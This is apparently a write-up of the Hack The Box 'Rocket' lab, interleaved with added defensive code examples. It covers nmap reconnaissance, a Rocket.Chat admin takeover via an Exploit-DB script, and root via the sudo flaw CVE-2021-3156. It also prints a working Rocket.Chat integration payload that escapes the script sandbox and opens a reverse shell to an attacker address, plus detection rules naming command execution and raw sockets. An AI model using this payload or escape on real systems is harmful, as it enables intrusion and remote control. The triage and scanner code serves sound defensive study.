# Rocket
```text
nmap -A -vv -Pn 10.129.172.77
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-23 18:47 PDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:47
Completed NSE at 18:47, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:47
Completed NSE at 18:47, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:47
Completed NSE at 18:47, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 18:47
Completed Parallel DNS resolution of 1 host. at 18:47, 0.02s elapsed
Initiating Connect Scan at 18:47
Scanning 10.129.172.77 [1000 ports]
Discovered open port 80/tcp on 10.129.172.77
Discovered open port 22/tcp on 10.129.172.77
Increasing send delay for 10.129.172.77 from 0 to 5 due to max_successful_tryno increase to 4
Increasing send delay for 10.129.172.77 from 5 to 10 due to max_successful_tryno increase to 5
Increasing send delay for 10.129.172.77 from 10 to 20 due to 16 out of 52 dropped probes since last increase.
Discovered open port 3000/tcp on 10.129.172.77
Completed Connect Scan at 18:48, 37.76s elapsed (1000 total ports)
Initiating Service scan at 18:48
Scanning 3 services on 10.129.172.77
Completed Service scan at 18:48, 32.29s elapsed (3 services on 1 host)
NSE: Script scanning 10.129.172.77.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:48
Completed NSE at 18:48, 9.54s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:48
Completed NSE at 18:48, 0.93s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:48
Completed NSE at 18:48, 0.00s elapsed
Nmap scan report for 10.129.172.77
Host is up, received user-set (0.25s latency).
Scanned at 2021-07-23 18:47:26 PDT for 81s
Not shown: 997 closed ports
Reason: 997 conn-refused
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d9:10:6a:46:42:2b:1a:70:54:2b:c3:d8:d3:da:07:6f (RSA)
| ssh-rsa [host key elided]
| 256 3c:b5:2b:6a:26:18:83:c3:3c:d9:77:34:58:13:5b:18 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG6v28IjKN3c3mRkJmvhlOnl+UIwV1T0lul7Qnat4zwkwCCrO9693fFf3R8msYjTxCT+5D5+zcIolfOvXzsPZAY=
| 256 91:34:8c:82:e0:8b:e3:d1:82:cb:6b:80:e0:99:e8:6a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHvYOqFs6OTsIn0MXAR5KPNM8Ui3a4Va9l0ewvdZVoPI
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 401666794A5E164A76E8BA21359B3477
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Rocket Hosting
3000/tcp open ppp? syn-ack
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| X-XSS-Protection: 1
| X-Content-Type-Options: nosniff
| X-Frame-Options: sameorigin
| X-Instance-ID: oMdkzHeT2TGk8szBK
| Content-Type: text/html; charset=utf-8
| Vary: Accept-Encoding
| Date: Sat, 24 Jul 2021 01:48:15 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <link rel="stylesheet" type="text/css" class="__meteor-css__" href="/789f2fee702e2a6a62ec245003ce4734eeec6f9a.css?meteor_css_resource=true">
| <meta charset="utf-8" />
| <meta http-equiv="content-type" content="text/html; charset=utf-8" />
| <meta http-equiv="expires" content="-1" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge" />
| <meta name="fragment" content="!" />
| <meta name="distribution" content="global" />
| <meta name="rating" content="general" />
| <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
| <meta name="mobile-web-app-capable" cont
| HTTPOptions:
| HTTP/1.1 200 OK
| X-XSS-Protection: 1
| X-Content-Type-Options: nosniff
| X-Frame-Options: sameorigin
| X-Instance-ID: oMdkzHeT2TGk8szBK
| Content-Type: text/html; charset=utf-8
| Vary: Accept-Encoding
| Date: Sat, 24 Jul 2021 01:48:17 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <link rel="stylesheet" type="text/css" class="__meteor-css__" href="/789f2fee702e2a6a62ec245003ce4734eeec6f9a.css?meteor_css_resource=true">
| <meta charset="utf-8" />
| <meta http-equiv="content-type" content="text/html; charset=utf-8" />
| <meta http-equiv="expires" content="-1" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge" />
| <meta name="fragment" content="!" />
| <meta name="distribution" content="global" />
| <meta name="rating" content="general" />
| <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
|_ <meta name="mobile-web-app-capable" cont
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.91%I=7%D=7/23%Time=60FB7160%P=aarch64-unknown-linux-gn
SF:u%r(GetRequest,1504,"HTTP/1\.1\x20200\x20OK\r\nX-XSS-Protection:\x201\r
SF:\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20sameorigin\
SF:r\nX-Instance-ID:\x20oMdkzHeT2TGk8szBK\r\nContent-Type:\x20text/html;\x
SF:20charset=utf-8\r\nVary:\x20Accept-Encoding\r\nDate:\x20Sat,\x2024\x20J
SF:ul\x202021\x2001:48:15\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\
SF:x20html>\n<html>\n<head>\n\x20\x20<link\x20rel=\"stylesheet\"\x20type=\
SF:"text/css\"\x20class=\"__meteor-css__\"\x20href=\"/789f2fee702e2a6a62ec
SF:245003ce4734eeec6f9a\.css\?meteor_css_resource=true\">\n<meta\x20charse
SF:t=\"utf-8\"\x20/>\n\t<meta\x20http-equiv=\"content-type\"\x20content=\"
SF:text/html;\x20charset=utf-8\"\x20/>\n\t<meta\x20http-equiv=\"expires\"\
SF:x20content=\"-1\"\x20/>\n\t<meta\x20http-equiv=\"X-UA-Compatible\"\x20c
SF:ontent=\"IE=edge\"\x20/>\n\t<meta\x20name=\"fragment\"\x20content=\"!\"
SF:\x20/>\n\t<meta\x20name=\"distribution\"\x20content=\"global\"\x20/>\n\
SF:t<meta\x20name=\"rating\"\x20content=\"general\"\x20/>\n\t<meta\x20name
SF:=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1,\x20m
SF:aximum-scale=1,\x20user-scalable=no\"\x20/>\n\t<meta\x20name=\"mobile-w
SF:eb-app-capable\"\x20cont")%r(HTTPOptions,1F86,"HTTP/1\.1\x20200\x20OK\r
SF:\nX-XSS-Protection:\x201\r\nX-Content-Type-Options:\x20nosniff\r\nX-Fra
SF:me-Options:\x20sameorigin\r\nX-Instance-ID:\x20oMdkzHeT2TGk8szBK\r\nCon
SF:tent-Type:\x20text/html;\x20charset=utf-8\r\nVary:\x20Accept-Encoding\r
SF:\nDate:\x20Sat,\x2024\x20Jul\x202021\x2001:48:17\x20GMT\r\nConnection:\
SF:x20close\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20<link\x20re
SF:l=\"stylesheet\"\x20type=\"text/css\"\x20class=\"__meteor-css__\"\x20hr
SF:ef=\"/789f2fee702e2a6a62ec245003ce4734eeec6f9a\.css\?meteor_css_resourc
SF:e=true\">\n<meta\x20charset=\"utf-8\"\x20/>\n\t<meta\x20http-equiv=\"co
SF:ntent-type\"\x20content=\"text/html;\x20charset=utf-8\"\x20/>\n\t<meta\
SF:x20http-equiv=\"expires\"\x20content=\"-1\"\x20/>\n\t<meta\x20http-equi
SF:v=\"X-UA-Compatible\"\x20content=\"IE=edge\"\x20/>\n\t<meta\x20name=\"f
SF:ragment\"\x20content=\"!\"\x20/>\n\t<meta\x20name=\"distribution\"\x20c
SF:ontent=\"global\"\x20/>\n\t<meta\x20name=\"rating\"\x20content=\"genera
SF:l\"\x20/>\n\t<meta\x20name=\"viewport\"\x20content=\"width=device-width
SF:,\x20initial-scale=1,\x20maximum-scale=1,\x20user-scalable=no\"\x20/>\n
SF:\t<meta\x20name=\"mobile-web-app-capable\"\x20cont");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:48
Completed NSE at 18:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:48
Completed NSE at 18:48, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:48
Completed NSE at 18:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.80 seconds
```
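Nmap leaves 3000/tcp as `ppp?` even though the captured banner is clearly an HTTP response from a Meteor application (the `__meteor-css__` stylesheet marker and the `X-Instance-ID` header). The Node script below is an added example, not part of the original notes: it parses the PORT table from nmap's normal output, attaches the NSE and fingerprint lines to the port they belong to, and names a guessed service from banner markers so an inventory or asset-tracking job does not record the port as "unknown". The sample input is a constructed, trimmed copy of the scan above; the banner markers, their labels and the association of `X-Instance-ID` with Rocket.Chat-style deployments are my own heuristics.

```javascript
// Added example, not from the original notes: parse the PORT table of nmap
// "normal" output and classify a service nmap could not name from the
// fingerprint-strings it captured. Sample input is constructed from the scan
// above, trimmed to the lines that matter.
const SAMPLE_NMAP = `
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp? syn-ack
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| X-Content-Type-Options: nosniff
| X-Instance-ID: oMdkzHeT2TGk8szBK
| <link rel="stylesheet" type="text/css" class="__meteor-css__" href="/789f2fee.css?meteor_css_resource=true">
`;

// One line of the PORT table: "<port>/<proto> <state> <service> <reason> [version...]".
const PORT_LINE = /^(\d+)\/(tcp|udp)\s+(\S+)\s+(\S+)\s+(\S+)\s*(.*)$/;

// Banner markers used to name a service nmap only guessed at. These are my
// heuristics: the __meteor-css__ class is what Meteor's HTML boilerplate emits,
// and an X-Instance-ID response header is what I have seen Rocket.Chat (itself
// a Meteor app) add to every response.
const BANNER_MARKERS = [
  { re: /class="__meteor-css__"|meteor_css_resource=true/, label: "meteor-web-app" },
  { re: /^X-Instance-ID:/m, label: "rocketchat-style-instance-header" },
];

function parseNmapPorts(text) {
  const ports = [];
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    const m = PORT_LINE.exec(line);
    if (m) {
      ports.push({
        port: Number(m[1]),
        proto: m[2],
        state: m[3],
        service: m[4].replace(/\?$/, ""),
        guessed: m[4].endsWith("?"), // nmap marks an unsure guess with "?"
        version: m[6],
        script: [],                  // NSE / fingerprint lines that follow the port
      });
    } else if (line.startsWith("|") && ports.length) {
      ports[ports.length - 1].script.push(line.replace(/^\|_?\s*/, ""));
    }
  }
  return ports;
}

// Name a guessed service from its captured banner, or keep nmap's own answer.
function classify(entry) {
  if (!entry.guessed) return entry.service;
  const banner = entry.script.join("\n");
  const hits = BANNER_MARKERS.filter((m) => m.re.test(banner)).map((m) => m.label);
  return hits.length ? hits.join("+") : `${entry.service}? (unclassified)`;
}

// Flat inventory rows: one per open port, flagged when a human should look.
function buildInventory(text) {
  return parseNmapPorts(text)
    .filter((e) => e.state === "open")
    .map((e) => ({
      port: e.port,
      proto: e.proto,
      service: classify(e),
      version: e.version || "(none reported)",
      needsManualReview: e.guessed,
    }));
}

console.log(JSON.stringify(buildInventory(SAMPLE_NMAP), null, 2));
```

Running it prints three rows; the 3000/tcp row comes out as `meteor-web-app+rocketchat-style-instance-header` with `needsManualReview: true`, which is the row a defender wants to chase: an internet-facing chat server on a non-standard port that the scanner could not version.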
dirb results:

```text
dirb http://
10.129.172.77/assets
10.129.172.77/index
```

Update /etc/hosts:

```text
10.129.172.77 rocket.htb
```

Interesting locations:

- http://rocket.htb/assets/js/
- http://rocket.htb:3000/home

Possible users:

- ezekial@rocket.htb
- emmap@rocket.htb
- elliot@rocket.htb
- admin@rocket.htb
Grabbed 50108.py off Exploit-DB.
Ran it using emmap@ as the unauthed user and elliot as the admin.
Had issues with non-Base32 tokens, so I modified the script to Base32-encode them before calling OATH.
Here's the code for the web integration for Rocket:

Virtually nothing is installed on the box, so I had to resort to Node.

```javascript
/* exported Script */
/* globals console, _, s */
/** Global Helpers
 *
 * console - A normal console instance
 * _ - An underscore instance
 * s - An underscore string instance
 */
class Script {
  /**
   * @params {object} request
   */
  process_incoming_request({ request }) {
    const require = console.log.constructor('return process.mainModule.require')();
    const { exec } = require('child_process');
    var net = require("net"), sh = require("child_process").exec("/bin/bash");
    var client = new net.Socket();
    client.connect(4444, "10.10.14.146", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
      sh.stderr.pipe(client);});
    //exec('python -c \'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("10.10.14.146"),int(os.getenv("4444"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")\'', (error, stdout, stderr) => {
    //  if (error) {
    //    console.log(`exec error: ${error}`);
    //    return;
    //  }
    //  console.log(`stdout: ${stdout}`);
    //  console.log(`stderr: ${stderr}`);
    //});
  }
}
```
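The integration script above only has `console`, `_` and `s` as globals, and it gets out of that sandbox through `console.log.constructor` (the `Function` constructor) to reach `process.mainModule.require`; everything after that is ordinary Node. For the administrator who reviews stored integration scripts, the following is an added example of a static triage scanner, not code from the original notes or from Rocket.Chat: it flags the escape idiom, host-process access, `require`, command execution and raw sockets, and rolls the hits into a verdict. The rule set, severities and both sample scripts are constructed; the escape sample mirrors the idiom above without the shell payload.

```javascript
// Added example, not from the original notes: a reviewer's scanner for
// Rocket.Chat integration scripts. Rules and sample scripts are constructed.
const RULES = [
  { id: "function-ctor-escape", re: /\.constructor\s*\(\s*['"`]/,
    severity: "block", why: "Function constructor reached via a builtin's .constructor: sandbox escape" },
  { id: "main-module-require", re: /process\.(mainModule|binding|dlopen)/,
    severity: "block", why: "host process internals reached from script code" },
  { id: "dynamic-require", re: /\brequire\s*\(/,
    severity: "review", why: "require() is not a sandbox global; the script expects to have escaped" },
  { id: "child-process", re: /child_process|\bexec(Sync)?\s*\(|\bspawn(Sync)?\s*\(/,
    severity: "block", why: "command execution" },
  { id: "raw-socket", re: /\bnet\.Socket\b|\.connect\s*\(\s*\d+/,
    severity: "block", why: "outbound raw TCP connection" },
  { id: "eval-like", re: /\beval\s*\(|new\s+Function\s*\(/,
    severity: "review", why: "dynamic code evaluation" },
];

// Scan every line, comments included: a reviewer wants to see commented-out
// attempts as well. Returns one finding per (line, rule) hit.
function scanIntegrationScript(source) {
  const findings = [];
  source.split("\n").forEach((line, idx) => {
    for (const rule of RULES) {
      if (rule.re.test(line)) {
        findings.push({ line: idx + 1, rule: rule.id, severity: rule.severity, why: rule.why, snippet: line.trim() });
      }
    }
  });
  return findings;
}

// Collapse findings into a verdict for the integration admin.
function verdict(findings) {
  if (findings.some((f) => f.severity === "block")) return "block";
  if (findings.length) return "review";
  return "ok";
}

// Constructed: what a legitimate webhook script looks like.
const BENIGN_SCRIPT = `class Script {
  process_incoming_request({ request }) {
    const text = s.trim(request.content.text || "");
    return { content: { text: "Received: " + text } };
  }
}`;

// Constructed to mirror the escape idiom used in the script above.
const ESCAPE_SCRIPT = `class Script {
  process_incoming_request({ request }) {
    const require = console.log.constructor('return process.mainModule.require')();
    const net = require("net");
    return { content: { text: request.content.text } };
  }
}`;

for (const [name, src] of [["benign", BENIGN_SCRIPT], ["escape", ESCAPE_SCRIPT]]) {
  const f = scanIntegrationScript(src);
  console.log(name, verdict(f), f.map((x) => `L${x.line}:${x.rule}`).join(" "));
}
```

Regex triage like this is a review aid, not a control: the durable mitigations are limiting who may create or edit integrations, keeping the server patched so the unauthenticated path to the admin account is closed, and treating any stored script that references `constructor(`, `process.` or `require(` as an incident to investigate rather than a style issue.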
The RSA key for Ezekiel:

```text
-----BEGIN OPENSSH PRIVATE KEY-----
[key material elided]
-----END OPENSSH PRIVATE KEY-----
```
Root popped with CVE-2021-3156
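CVE-2021-3156 is the sudo heap overflow ("Baron Samedit") that Qualys disclosed in January 2021; upstream it affects 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1 and is fixed in 1.9.5p2, and the advisory's non-destructive check is `sudoedit -s /`, which a vulnerable build answers with `sudoedit: /: not a regular file` and a patched build answers with a usage message. The following triage helpers are an added example, not part of the original notes: they parse `sudo --version` output into a comparable tuple, test it against the affected ranges, classify the output of the probe, and combine the two so that the behavioural signal wins over the version number. The sample strings are constructed; the function names are mine.

```javascript
// Added example, not from the original notes: triage helpers for
// CVE-2021-3156 (sudo "Baron Samedit"). Affected upstream ranges per the
// advisory: 1.8.2 to 1.8.31p2 and 1.9.0 to 1.9.5p1, fixed in 1.9.5p2.
// Sample strings below are constructed.

// "Sudo version 1.8.31" -> [1, 8, 31, 0]; "Sudo version 1.9.5p1" -> [1, 9, 5, 1]
function parseSudoVersion(versionOutput) {
  const m = /Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?/i.exec(versionOutput);
  if (!m) return null;
  return [Number(m[1]), Number(m[2]), Number(m[3]), m[4] ? Number(m[4]) : 0];
}

function compareVersions(a, b) {
  for (let i = 0; i < 4; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

const AFFECTED_RANGES = [
  { lo: [1, 8, 2, 0], hi: [1, 8, 31, 2] }, // legacy branch
  { lo: [1, 9, 0, 0], hi: [1, 9, 5, 1] },  // stable branch
];

// True if the upstream version number falls in an affected range. Distro
// packages backport the fix without bumping this number (Ubuntu 20.04 keeps
// reporting 1.8.31), so "true" means "check the package changelog or run the
// probe", not "exploitable".
function upstreamVersionAffected(versionOutput) {
  const v = parseSudoVersion(versionOutput);
  if (!v) return null;
  return AFFECTED_RANGES.some((r) => compareVersions(v, r.lo) >= 0 && compareVersions(v, r.hi) <= 0);
}

// Classify the output of the advisory's non-destructive probe "sudoedit -s /":
// a vulnerable build complains that "/" is not a regular file, a patched build
// rejects the option combination with a usage message.
function classifySudoeditProbe(probeOutput) {
  if (/not a regular file/.test(probeOutput)) return "vulnerable";
  if (/^usage:/im.test(probeOutput)) return "patched";
  return "unknown";
}

// Combine both signals into one status for a fleet report; behaviour beats
// version numbers whenever the probe output is available.
function sudoTriage(versionOutput, probeOutput) {
  const byProbe = classifySudoeditProbe(probeOutput || "");
  if (byProbe !== "unknown") return byProbe;
  const byVersion = upstreamVersionAffected(versionOutput || "");
  if (byVersion === null) return "unknown";
  return byVersion ? "possibly-vulnerable (verify backport)" : "patched";
}

// Constructed samples: an unpatched 1.8.31 and a distro-patched 1.8.31.
console.log(sudoTriage("Sudo version 1.8.31", "sudoedit: /: not a regular file"));
console.log(sudoTriage("Sudo version 1.8.31", "usage: sudoedit [-AknS] [-u user] file ..."));
```

The point of the combined function is the second sample: a version-only scanner would report a fully patched Ubuntu 20.04 host as vulnerable forever, while the probe output settles it in one line. Collect both strings from each host with your existing inventory tooling and feed them to `sudoTriage`; any host that returns `vulnerable` is the one the page's final line describes.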